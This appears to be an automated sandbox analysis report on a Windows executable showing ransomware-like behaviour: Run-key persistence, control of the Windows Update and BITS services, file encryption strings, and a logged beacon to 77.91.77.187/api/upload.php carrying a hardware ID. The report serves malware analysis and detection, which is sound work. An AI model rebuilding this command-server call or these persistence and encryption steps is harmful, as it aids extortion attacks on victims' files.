IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2f4ab	0x2f600	745f097cb9fb6a5a7634a1e5eab12bd4	False	0.4737796833773087	data	6.383695566305574	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x31000	0x132e4	0x13400	b5f89de21850a09171ba34ca79284dd5	False	0.3939224837662338	data	5.110357191980083	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x45000	0x47b0	0x3000	f4038102f345709e71b92225fe9545f6	False	0.15983072916666666	data	4.634606530652064	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x4a000	0x2604	0x2800	e9b4ef2a8895882b3be78a5cf1d6949d	False	0.46298828125	data	5.293159935655324	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x4d000	0x1e0	0x200	f78ccbed5a69a2e3c3a9034e4f9bdb1c	False	0.53125	data	4.7137725829467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4e000	0xc28	0xe00	b542418236eb450c0ad4bbf1ccdfb36b	False	0.314453125	data	5.125626328317608	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4d060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
KERNEL32.dll	GetLastError, GetModuleFileNameA, QueryPerformanceCounter, QueryPerformanceFrequency, LocalFree, FormatMessageA, GetLocaleInfoEx, CreateFileW, FindClose, FindFirstFileW, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, SetFileInformationByHandle, AreFileApisANSI, CloseHandle, GetModuleHandleW, GetFileInformationByHandleEx, MultiByteToWideChar, WideCharToMultiByte, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, InitializeSListHead, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, IsDebuggerPresent, SetLastError
ADVAPI32.dll	RegCloseKey, CloseServiceHandle, OpenServiceW, RegOpenKeyExW, OpenSCManagerW, ControlService, RegSetValueExW
MSVCP140.dll	?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z, ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z, ?good@ios_base@std@@QEBA_NXZ, ??7ios_base@std@@QEBA_NXZ, ??Bios_base@std@@QEBA_NXZ, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ??Bid@locale@std@@QEAA_KXZ, ?set_new_handler@std@@YAP6AXXZP6AXXZ@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, _Cnd_signal, _Thrd_hardware_concurrency, _Cnd_init_in_situ, ??1_Lockit@std@@QEAA@XZ, ??0_Lockit@std@@QEAA@H@Z, ?_Throw_Cpp_error@std@@YAXH@Z, ?uncaught_exceptions@std@@YAHXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?_Xout_of_range@std@@YAXPEBD@Z, ?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Winerror_map@std@@YAHH@Z, ?_Xbad_function_call@std@@YAXXZ, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, _Cnd_destroy_in_situ, _Cnd_broadcast, _Mtx_unlock, _Thrd_join, _Thrd_id, _Cnd_wait, _Cnd_do_broadcast_at_thread_exit, _Mtx_lock, ?_Syserror_map@std@@YAPEBDH@Z, ?_Xlength_error@std@@YAXPEBD@Z, ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z, ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z
bcrypt.dll	BCryptCloseAlgorithmProvider, BCryptOpenAlgorithmProvider, BCryptGenRandom
WININET.dll	InternetCloseHandle, HttpOpenRequestW, InternetReadFile, HttpSendRequestW, InternetCrackUrlW, InternetOpenW, InternetConnectW
VCRUNTIME140_1.dll	__CxxFrameHandler4
VCRUNTIME140.dll	__current_exception_context, __current_exception, memcmp, __RTDynamicCast, memset, memmove, __C_specific_handler, _CxxThrowException, __std_type_info_name, __std_type_info_compare, __std_terminate, _purecall, __std_exception_copy, __std_exception_destroy, memcpy, memchr
api-ms-win-crt-stdio-l1-1-0.dll	ungetc, fwrite, fsetpos, fread, _fseeki64, fgetpos, fgetc, _set_fmode, fclose, fflush, __p__commode, fputc, _get_stream_buffer_pointers, setvbuf
api-ms-win-crt-heap-l1-1-0.dll	free, _aligned_malloc, _callnewh, _aligned_free, _set_new_mode, malloc
api-ms-win-crt-runtime-l1-1-0.dll	_c_exit, abort, _seh_filter_exe, _get_initial_narrow_environment, _initterm, _initterm_e, exit, _set_app_type, _initialize_narrow_environment, _configure_narrow_argv, _register_thread_local_exe_atexit_callback, _exit, _beginthreadex, _crt_atexit, __p___argc, __p___argv, _invalid_parameter_noinfo, _invalid_parameter_noinfo_noreturn, terminate, _initialize_onexit_table, _errno, _register_onexit_function, _cexit
api-ms-win-crt-filesystem-l1-1-0.dll	_unlock_file, _lock_file
api-ms-win-crt-environment-l1-1-0.dll	_dupenv_s
api-ms-win-crt-string-l1-1-0.dll	strcmp
api-ms-win-crt-time-l1-1-0.dll	_time64
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr
api-ms-win-crt-locale-l1-1-0.dll	___lc_codepage_func, _configthreadlocale

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 22, 2024 14:44:54.471968889 CEST	49730	80	192.168.2.4	77.91.77.187
Oct 22, 2024 14:44:54.477658987 CEST	80	49730	77.91.77.187	192.168.2.4
Oct 22, 2024 14:44:54.477761984 CEST	49730	80	192.168.2.4	77.91.77.187
Oct 22, 2024 14:44:54.477912903 CEST	49730	80	192.168.2.4	77.91.77.187
Oct 22, 2024 14:44:54.483321905 CEST	80	49730	77.91.77.187	192.168.2.4
Oct 22, 2024 14:45:02.970726967 CEST	80	49730	77.91.77.187	192.168.2.4
Oct 22, 2024 14:45:02.970882893 CEST	49730	80	192.168.2.4	77.91.77.187
Oct 22, 2024 14:45:02.971050024 CEST	49730	80	192.168.2.4	77.91.77.187
Oct 22, 2024 14:45:02.976330042 CEST	80	49730	77.91.77.187	192.168.2.4

HTTP Request Dependency Graph

77.91.77.187

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	77.91.77.187	80	7568	C:\Users\user\Desktop\PC4rbXSgl4.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 14:44:54.477912903 CEST	159	OUT	GET /api/upload.php?locker=test&amount=10&owner=6&hwid=l7NtZkdgeMq5CGbABNg1whI0E8CPHhHD HTTP/1.1 Accept: text/* User-Agent: Encryptor Host: 77.91.77.187

Target ID:	0
Start time:	08:44:53
Start date:	22/10/2024
Path:	C:\Users\user\Desktop\PC4rbXSgl4.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\PC4rbXSgl4.exe"
Imagebase:	0x7ff6f18a0000
File size:	300'544 bytes
MD5 hash:	12B818950D749C378AABD81A0BAC9742
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:44:53
Start date:	22/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	28.2%
Total number of Nodes:	1739
Total number of Limit Nodes:	3

Executed Functions

Function 00007FF6F18A7930 Relevance: 95.5, APIs: 35, Strings: 19, Instructions: 1027registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F18ABF80: memmove.VCRUNTIME140(?,?,?,?,00007FF6F18AA27E,?,?,00000002,00007FF6F18B2E91), ref: 00007FF6F18ABFB8

Part of subcall function 00007FF6F18ABF80: memmove.VCRUNTIME140(?,?,?,?,00007FF6F18AA27E,?,?,00000002,00007FF6F18B2E91), ref: 00007FF6F18AC058

Part of subcall function 00007FF6F18A73F0: OpenSCManagerW.ADVAPI32 ref: 00007FF6F18A7414
Part of subcall function 00007FF6F18A73F0: GetLastError.KERNEL32 ref: 00007FF6F18A7438
Part of subcall function 00007FF6F18A73F0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A7443
Part of subcall function 00007FF6F18A73F0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A7453

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A7B37
memmove.VCRUNTIME140 ref: 00007FF6F18A7BB4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A7C05
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A7DC9
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A821A
GetModuleFileNameA.KERNEL32 ref: 00007FF6F18A8230
RegOpenKeyExW.ADVAPI32 ref: 00007FF6F18A829E
RegSetValueExW.ADVAPI32 ref: 00007FF6F18A8329
RegCloseKey.ADVAPI32 ref: 00007FF6F18A8334
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A8379
GetLastError.KERNEL32 ref: 00007FF6F18A839D
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A83A8
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A83B8

Part of subcall function 00007FF6F18A76A0: _dupenv_s.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FF6F18A76EF
Part of subcall function 00007FF6F18A76A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A77A4
Part of subcall function 00007FF6F18A76A0: memset.VCRUNTIME140 ref: 00007FF6F18A77D0
Part of subcall function 00007FF6F18A76A0: ??Bios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18A782F

Part of subcall function 00007FF6F18ABF80: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18AC076

Part of subcall function 00007FF6F18ABF80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF6F18AA27E,?,?,00000002,00007FF6F18B2E91), ref: 00007FF6F18AC035

Part of subcall function 00007FF6F18A98F0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF6F18A7A10), ref: 00007FF6F18A9985
Part of subcall function 00007FF6F18A98F0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18A9A21

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A83F3
memset.VCRUNTIME140 ref: 00007FF6F18A851B
_Thrd_hardware_concurrency.MSVCP140 ref: 00007FF6F18A8520
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A7EBC

Part of subcall function 00007FF6F18CDEB0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18CDEE0
Part of subcall function 00007FF6F18CDEB0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18CDEE6

memmove.VCRUNTIME140 ref: 00007FF6F18A7F35
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A7F91
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A7FED
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A803E
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A7C50

Part of subcall function 00007FF6F18CDEB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6F18AC6D5), ref: 00007FF6F18CDECA

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A8B82

Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB3E9
Part of subcall function 00007FF6F18AB370: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB409
Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB419
Part of subcall function 00007FF6F18AB370: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB4FC
Part of subcall function 00007FF6F18AB370: ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB503
Part of subcall function 00007FF6F18AB370: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB510

_Cnd_init_in_situ.MSVCP140 ref: 00007FF6F18A85D5
__std_fs_code_page.MSVCPRT ref: 00007FF6F18A865E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A86E5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A881C

Part of subcall function 00007FF6F18AB370: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB466

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A8983

Part of subcall function 00007FF6F18A4E70: _Mtx_lock.MSVCP140 ref: 00007FF6F18A4E8B
Part of subcall function 00007FF6F18A4E70: ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF6F18A4EB3
Part of subcall function 00007FF6F18A4E70: _Mtx_unlock.MSVCP140 ref: 00007FF6F18A4EC5
Part of subcall function 00007FF6F18A4E70: _Cnd_broadcast.MSVCP140 ref: 00007FF6F18A4ED2
Part of subcall function 00007FF6F18A4E70: _Thrd_id.MSVCP140 ref: 00007FF6F18A4EEE
Part of subcall function 00007FF6F18A4E70: _Thrd_join.MSVCP140 ref: 00007FF6F18A4F0C
Part of subcall function 00007FF6F18A4E70: _Cnd_destroy_in_situ.MSVCP140 ref: 00007FF6F18A4F30

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A89EA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A8A44
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A8AA6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A8B08
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18A8BCF
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18A8BDA
?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18A8C3B

Strings

directory_iterator::operator++, xrefs: 00007FF6F18A8C09
hat_id=, xrefs: 00007FF6F18A7F0D
Chat Session Response: , xrefs: 00007FF6F18A81D3
.exe, xrefs: 00007FF6F18A846D
BITS, xrefs: 00007FF6F18A79C4
Encryption Key: , xrefs: 00007FF6F18A7D82
wuauserv, xrefs: 00007FF6F18A7992
Windows, xrefs: 00007FF6F18A843B
Failed to create chat session with PHP app, xrefs: 00007FF6F18A8021
Encryption process initiated., xrefs: 00007FF6F18A8966
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00007FF6F18A8290
.dll, xrefs: 00007FF6F18A849F
Failed to retrieve encryption key from PHP app, xrefs: 00007FF6F18A7C33
&hwid=, xrefs: 00007FF6F18A7B96
directory_entry::status, xrefs: 00007FF6F18A8BFB
directory_iterator::directory_iterator, xrefs: 00007FF6F18A8BEA
MyEncryptor, xrefs: 00007FF6F18A831D
RegOpenKeyEx failed with error: , xrefs: 00007FF6F18A8387
., xrefs: 00007FF6F18A884E

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@$V01@@$Concurrency::cancel_current_task$memmove$?good@ios_base@std@@ErrorLastOpenmemset$?always_noconv@codecvt_base@std@@?flush@?$basic_ostream@?setstate@?$basic_ios@?sputc@?$basic_streambuf@?uncaught_exceptions@std@@Bios_base@std@@CloseCnd_broadcastCnd_destroy_in_situCnd_init_in_situCpp_error@std@@FileManagerModuleMtx_lockMtx_unlockNameOsfx@?$basic_ostream@Thrd_hardware_concurrencyThrd_idThrd_joinThrow_V12@Value__std_fs_code_page_dupenv_smalloc
String ID: &hwid=$.$.dll$.exe$BITS$Chat Session Response: $Encryption Key: $Encryption process initiated.$Failed to create chat session with PHP app$Failed to retrieve encryption key from PHP app$MyEncryptor$RegOpenKeyEx failed with error: $Software\Microsoft\Windows\CurrentVersion\Run$Windows$directory_entry::status$directory_iterator::directory_iterator$directory_iterator::operator++$hat_id=$wuauserv
API String ID: 3815261804-2131133029
Opcode ID: a3496ff0b8bf30f313e674f80c7c7f1cc76cf0a4d9d1524f2d81c3be7c603a95
Instruction ID: 7c2b7a8516c16fc916eb70aedb6a1b472c5eecef75fbcd87b6d5425c2f75dd24
Opcode Fuzzy Hash: a3496ff0b8bf30f313e674f80c7c7f1cc76cf0a4d9d1524f2d81c3be7c603a95
Instruction Fuzzy Hash: 65B29772A28BC692EB20DB65E5403BA6351FB857D0F505332DABD82AD9EF7CD085C700

Function 00007FF6F18A5A50 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 293
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB3E9
Part of subcall function 00007FF6F18AB370: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB409
Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB419
Part of subcall function 00007FF6F18AB370: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB4FC
Part of subcall function 00007FF6F18AB370: ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB503
Part of subcall function 00007FF6F18AB370: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB510

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A5AC8
InternetOpenW.WININET ref: 00007FF6F18A5AE5
GetLastError.KERNEL32 ref: 00007FF6F18A5B09
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A5B14
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A5B24
InternetCrackUrlW.WININET ref: 00007FF6F18A5BDE
GetLastError.KERNEL32 ref: 00007FF6F18A5C02
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A5C0D
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A5C1D
InternetCloseHandle.WININET ref: 00007FF6F18A5C26
InternetConnectW.WININET ref: 00007FF6F18A5CE3
HttpOpenRequestW.WININET ref: 00007FF6F18A5D35
GetLastError.KERNEL32 ref: 00007FF6F18A5D59
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A5D64
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A5D74
InternetCloseHandle.WININET ref: 00007FF6F18A5D7D
HttpSendRequestW.WININET ref: 00007FF6F18A5D98
GetLastError.KERNEL32 ref: 00007FF6F18A5DB8
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A5DC3
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A5DD3
InternetCloseHandle.WININET ref: 00007FF6F18A5DDC
InternetCloseHandle.WININET ref: 00007FF6F18A5DE5

Part of subcall function 00007FF6F18AB370: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB466

Strings

InternetConnect failed with error: , xrefs: 00007FF6F18A5CF1
InternetOpen failed with error: , xrefs: 00007FF6F18A5AF3
InternetCrackUrl failed with error: , xrefs: 00007FF6F18A5BEC
h, xrefs: 00007FF6F18A5B98
HttpOpenRequest failed with error: , xrefs: 00007FF6F18A5D43
HttpSendRequest failed with error: , xrefs: 00007FF6F18A5DA2
Making GET request to: , xrefs: 00007FF6F18A5A8F
Encryptor, xrefs: 00007FF6F18A5ADE
GET, xrefs: 00007FF6F18A5D2B
GET request completed with response: , xrefs: 00007FF6F18A5E92
text/*, xrefs: 00007FF6F18A5CFD

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@$Internet$V01@@$CloseErrorHandleLast$?good@ios_base@std@@HttpOpenRequest$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputc@?$basic_streambuf@?uncaught_exceptions@std@@ConnectCrackOsfx@?$basic_ostream@SendV12@
String ID: Encryptor$GET$GET request completed with response: $HttpOpenRequest failed with error: $HttpSendRequest failed with error: $InternetConnect failed with error: $InternetCrackUrl failed with error: $InternetOpen failed with error: $Making GET request to: $h$text/*
API String ID: 1551654344-1827163079
Opcode ID: 779ffa6e9fdf7313ca3d8674e6eee0c4e89e3e5b2f46ff701b89a174844bc3ba
Instruction ID: 64b0817dac2f69f2832c9c61d8dfb07da3a31620ead4a685306cc1a59d767dcc
Opcode Fuzzy Hash: 779ffa6e9fdf7313ca3d8674e6eee0c4e89e3e5b2f46ff701b89a174844bc3ba
Instruction Fuzzy Hash: EFE15F61F28B4396EB10DB65EA542A83762FB45BD4F405232DE7D82AD8EF7CD185C700

